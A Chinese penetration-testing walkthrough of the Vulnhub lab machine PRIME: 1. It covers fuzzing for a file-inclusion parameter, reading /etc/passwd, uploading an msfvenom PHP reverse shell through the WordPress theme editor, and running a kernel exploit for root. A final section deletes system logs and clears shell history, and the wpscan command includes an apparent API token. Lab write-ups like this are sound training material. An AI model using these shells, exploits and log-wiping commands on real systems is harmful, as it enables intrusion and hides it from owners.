Vulnhub | 实战靶场渗透测试 - PRIME: 1

0x00 免责声明

        本文仅限于学习讨论与技术知识的分享,不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任,一旦造成后果请自行承担!

        

        

0x01 前言

        这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。

        

        

0x02 环境说明

攻击机:Kali linux(192.168.239.128)
靶机:Prime1(192.168.239.129)
项目地址:https://www.vulnhub.com/entry/prime-1,358
Vulnhub | 实战靶场渗透测试 - PRIME: 1_第1张图片 靶机显示内容

        

        文中使用 Kali linux 2022.1 系统在虚拟机 NAT 网络的环境下进行示范。演示过程中使用到的工具均在 Kali 系统中自带安装。关于靶场环境可以访问项目地址进行下载学习。

        

        

0x03 端口扫描

使用 arp-scan 命令扫描局域网主机,发现目标端口为 192.168.239.129 。这里的主机发现主要是通过排除法进行的,其中 1、2、254 都是已知设备。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第2张图片

arp-scan -l

        

使用 nmap 命令查看目标端口和服务的开放情况,发现开放 22ssh 端口和 80http 端口, 22 端口和 80 端口一般都是爆破和漏洞利用两个点。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第3张图片

nmap -p 1-65535 -A 192.168.239.129

        

        

0x04 目录扫描

浏览器访问目标 IP ,靶场设计者就给了一个图片,有可能在图片中可以找到一些重要信息,这里先记录一下,如果最后实在没有思路的时候就尝试一下。首先检查了网页源代码并没有可用信息。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第4张图片

        

使用 dirb 对目标站点的目录扫描看看,结果发现 dev 和 index.php 目录以及一些其他目录文件。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第5张图片

dirb http://192.168.239.129/

        

浏览器访问 dev 目录发现一段提示。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第6张图片

翻译内容:

你好,

你现在处于 0 级阶段。

在真实的环境中,我们应该使用工具不断尝试挖掘漏洞。

加油,黑客。

        

        

0x05 指纹识别

使用 cmseek 工具对刚刚目录扫描出来的后台系统进行指纹信息收集。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第7张图片

cmseek -u http://192.168.239.129/wordpress

        

        

0x06 后缀扫描

对网页进行后缀扫描,检查此网页是否存在源代码泄露,发现网站存在几个泄露文件。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第8张图片

dirb http://192.168.239.129 -X .html,.zip,.txt,.php,.tmp,.rar,.tgz,.tar,.git,.svn,.bak,.doc,.docx,.xls,.xlsx,.PPTX,.PDF,.jpg,.png,.GIF,.jar

        

使用浏览器访问前面几个泄露文件,检查发现并没有什么可用信息。当访问最后一个文件时,发现第二个提示。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第9张图片

翻译内容: 

看来,你发现了一些秘密。

那么,我就给你一点提示。

在你找到的 php 的每一页上尝试使用 fuzz 。

如果找到任何正确的参数,那么你可以继续探索。

如果仍然卡在此处,那么你应该学习一下对 OSCP 的使用。
//看到了 location.txt 那你就可以继续探索//

        

        

0x07 模糊测试

使用 fuzz 查找 image.php 中的参数,因为在刚刚的后缀扫描中我们分别扫出了 image.php index.php 文件,那么我们要将两个文件都进行模糊测试。避免错过重要信息。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第10张图片

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.239.129/image.php?FUZZ

        

对参数进行过滤,过滤行数、字和字符均未发现可用的有效信息,过滤方法是将表格中的 Lines 和 Word 以及 Chars 的相同信息进行屏蔽。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第11张图片

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 --hw 12 --hh 147 http://192.168.239.129/image.php?FUZZ

        

再次使用 fuzz 查找 index.php 中的参数,对参数进行过滤,发现可用参数 "file" ,猜测页面可能存在文件包含漏洞。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第12张图片

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 --hw 12 --hh 147 http://192.168.239.129/index.php?FUZZ

        

        

0x08 文件包含漏洞

使用浏览器查看账户信息测试一下参数,测试了 common.txt 和 phpinfo.php 以及一些刚刚扫描到的目录信息等均显示此页面。说明存在文件包含漏洞,注意在网页下方有一处提示,说明还有一个文件可以获取到有用的信息。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第13张图片

翻译内容: 

做的很好,

你打开的文件是错的。

        

渗透测试常见敏感信息路径: 

路径地址 路径描述
/etc/passwd 账户信息文件
/etc/shadow 账户密码文件
/usr/local/app/php5/lib/php.ini PHP相关配置文件
/etc/httpd/conf/httpd.conf Apache配置文件
/usr/local/app/apache2/conf/httpd.conf Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf 虚拟网站配置文件
/etc/my.conf mysql 配置文件

        

根据网页提示说打开的文件是错误的,那么肯定还有一个文件没有访问到,也许这个文件中存在着重要信息。但是这个文件目前还不能确定是不是已经收集到的信息,所以先对收集到的信息做一个简单的梳理。通过检查获取到的信息发现在第二处提示的时候告诉我们 "看到了 location.txt 那你就可以继续探索" 

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第14张图片

        

根据提示信息二给出的思路将访问路径更改为 location.txt 进行访问,结果发现新的提示,告诉我们在 php 页面中使用 secrettier360 参数会有新发现。 

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第15张图片

翻译内容: 

不错,现在你知道正确的参数了,

现在对下一个在进行进行挖掘,

在其他 php 页面上使用 secrettier360 参数可以获得更多乐趣。

        

分别使用 index.php 文件和 image.php 文件通过 file 查看 secrettier360 参数到底有什么。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第16张图片

翻译内容: 

最后,你得到了正确的参数

        

使用 fuzz 测试一下 secrettier360 看看能不能有新的发现,这里在对 index.php 进行模糊测试时并未过滤出有效信息。但是之前在执行后缀扫描时还有一个 image.php 没有使用到,这里检查一下这个文件,看看是否可以获取到有效信息。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第17张图片

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.239.129/image.php?secrettier360=FUZZ

        

进行过滤查找,发现可用参数 "dev"

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第18张图片

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 --hw 17 --hh 197 http://192.168.239.129/image.php?secrettier360=FUZZ

        

使用获得的参数对浏览器访问,发现一处新的提示,也许这就是作者要将新发现藏在 image 文件中的原因吧。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第19张图片

翻译内容: 

最后,你得到了正确的参数

你好,你现在处于 0 级阶段。在真实的环境中,我们应该使用工具不断尝试挖掘漏洞。加油,黑客。

        

提示说已经正确了,那么我们可以通过检查常见的敏感信息路径,判断目标站点是否存在敏感信息泄露,从而发现目标的泄露信息。在上文中有对渗透测试常见敏感信息路径做一个简要的汇总,如有需要可以回顾上文进行查看。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第20张图片

curl http://192.168.239.129/image.php?secrettier360=/etc/passwd

        

将代码拖入编译器可以方便审查,在检查过程中,发现在 /home/saket 路径中有一个关于 password.txt 的文件。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第21张图片

find password.txt file in my directory:/home/saket

        

在浏览器中访问 /home/saket 路径,检查一下这个 txt 文件看看是否有密码数据。发现一个提示,还是说得到了正确的参数,但是后面一句是 follow_the_ippsec

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第22张图片

翻译内容: 

最后,你得到了正确的参数

follow_the_ippsec

        

        

0x09 后台登录

在刚才的信息收集时,目标站点还有一个 wordpress 博客管理系统,但是我一直没有访问这个系统。直到刚刚拿到了一个信息是 "follow_the_ippsec" ,才发现这个可能是登录的密码。使用浏览器访问 wordpress ,在页面中查看到一个用户名为 victor

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第23张图片

        

通过获得的密码,尝试登录 wordpress ,结果可以成功登录系统后台。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第24张图片

        

        

0x10 漏洞扫描

利用漏扫工具扫描 wordpress 查看是否存在漏洞,发现漏洞挺多,其中有一个标题为: WordPress 5.2.2 - 存储评论的跨站脚本攻击(XSS) ,那么可以尝试生成一个shell文件上传到评论中。利用 xss 漏洞的特性去访问这个数据时漏洞则会执行。 wpscan 漏扫工具最后一串字符要输入自己的 API 密钥,关于 API 密钥可以在 wpscan 官网中注册获得。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第25张图片

wpscan --url http://192.168.239.129/wordpress --disable-tls-checks --api-token rOCN4Wxw3LdnBaPExsChadlEzbGvgd11uDUdMfqn3dg

        

        

0x11 MSF反弹Shell

使用 msf 创建一个 shell 文件,可以和本地 Kali 系统的 7777 端口进行连接。Vulnhub | 实战靶场渗透测试 - PRIME: 1_第26张图片

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.239.128 lport=7777 -o shell.php

        

查看 shell.php 文件中的代码。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第27张图片

        

        

0x12 漏洞利用

访问主题编辑器中的 Appearance中 的 Theme Editor 。可以看到这是一个上传点。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第28张图片

        

找到了一个后缀是 php 的文件,那么我们可以写一个 shell 进行文件上传。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第29张图片

        

在上文中已经使用 msf 写了一个 shell 文件,那么直接复制粘贴即可。最后点击更新文件提升成功更新了文件。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第30张图片

        

使用 msfconsole 命令访问 msf 终端。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第31张图片

msfconsole

        

设置监听端口,建立本地 Kali 与目标计算机的远程连接。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第32张图片

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.239.128
set lport 7777
exploit

        

当浏览器成功访问刚刚上传的 shell 文件路径时, msf 即可成功连接。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第33张图片

http://192.168.239.129/wordpress/wp-content/themes/twentynineteen/secret.php

        

        

0x13 获取主机信息

查看目标用户 ID 信息。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第34张图片

getuid

        

查看目标计算机系统信息。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第35张图片

sysinfo

        

        

0x14 系统漏洞搜索

使用 msf 搜索看看 Ubuntu 16.04 系统有没有什么潜在的漏洞,在搜索中发现 Linux Kernel < 4.13.9 (ubuntu 16,04 / Fedora 27) - Local ,这个是 linux 的一个内核漏洞。我对 linux 内核安全还不够熟悉,所以去看了一些别的文章了解到可以用这个漏洞进行权限提升。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第36张图片

searchsploit 16.04 Ubuntu

        

        

0x15 权限提升

使用命令访问 45010.c 的文件路径。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第37张图片

cd /usr/share/exploitdb/exploits/linux/local

        

检索是否有这个文件,发现 45010.c 文件。

ls 45010*

        

复制 45010.c 文件到根目录中。

cp 45010.c ../../../../../../

        

返回到根目录查看 45010.c 文件。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第38张图片

cd ../

        

复制 45010.c 文件,重命名为 45010 。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第39张图片

gcc 45010.c -o 45010

        

上传木马文件到目标服务器中,使用 tmp 路径是因为这个路径是可以共享的。

upload /45010 /tmp/45010

        

使用 shell 命令访问目标计算机系统。

shell

        

打开 tmp 路径查看发现刚刚的木马文件成功传入目标计算机。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第40张图片

cd /tmp

        

使用 chmod +x 45010 命令,来执行权限提升。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第41张图片

chmod +x 45010

        

运行 45010 文件执行木马,获得目标系统的权限。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第42张图片

./45010

        

ⅩⅠ执行 whoami 命令显示目标计算机用户的用户名。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第43张图片

whoami

        

ⅩⅡ检查目标系统目录中发现的几个 txt 文件,至此已经完成了权限提升。

Vulnhub | 实战靶场渗透测试 - PRIME: 1_第44张图片

cat enc.txt
cat key.txt
cat root.txt

        

        

0x16 痕迹清理

使用 rm -rf 命令可以强制删除文件,后面的是一些日志路径以及指定这个日期进行删除。

rm -rf /var/run/utmp-2023-06-01 /var/log/wtmp-2023-06-01 /var/log/lastlog-2023-06-01 /var/log/btmp-2023-06-01 /var/log/auth.log-2023-06-01 /var/log/secure-2023-06-01 /var/log/maillog-2023-06-01 /var/log/message-2023-06-01 /var/log/cron-2023-06-01 /var/log/spooler-2023-06-01 /var/log/boot.log-2023-06-01

        

关于痕迹清理的相关命令:

命令 描述
histroy -r 删除当前会话历史记录
history -c 删除内存中的所有命令历史
export HISTFILE=/dev/null export HISTSIZE=0 以 root 执行,可以不记录命令

        

        

0x17 参考文献

[1].魏钦6666. Prime(wfuzz模糊测试,CVE-2017-16695)[EB/OL]. [2023-06-01]. https://blog.csdn.net/m0_66299232/article/details/127404497?spm=1001.2014.3001.5502.

[2].红萝卜绿萝卜. 0x01--Prime_Series_Level-1靶场[EB/OL]. [2023-06-01]. https://blog.csdn.net/weixin_43742395/article/details/120323256.

[3].小孔吃不胖. Vulnhub靶场Prime_Series_Level-1渗透[EB/OL]. [2023-06-01]. https://blog.csdn.net/m0_65712192/article/details/128914895.

[4].清尘大哥. 渗透测试之痕迹清除[EB/OL]. [2023-06-01]. https://blog.csdn.net/qq_29864185/article/details/107059909.

[5].蜜罐小明哥. 安全研究 | 后渗透阶段清理痕迹方式总结[EB/OL]. [2023-06-01]. https://www.freebuf.com/articles/system/266458.html.

[6].linuxsec. 提权总结以及各种利用姿势[EB/OL]. [2023-06-01]. https://www.cnblogs.com/linuxsec/articles/11966287.html.

        

        

0x18 总结

由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

你可能感兴趣的:(Vulnhub,Vulnhub,渗透测试,靶场)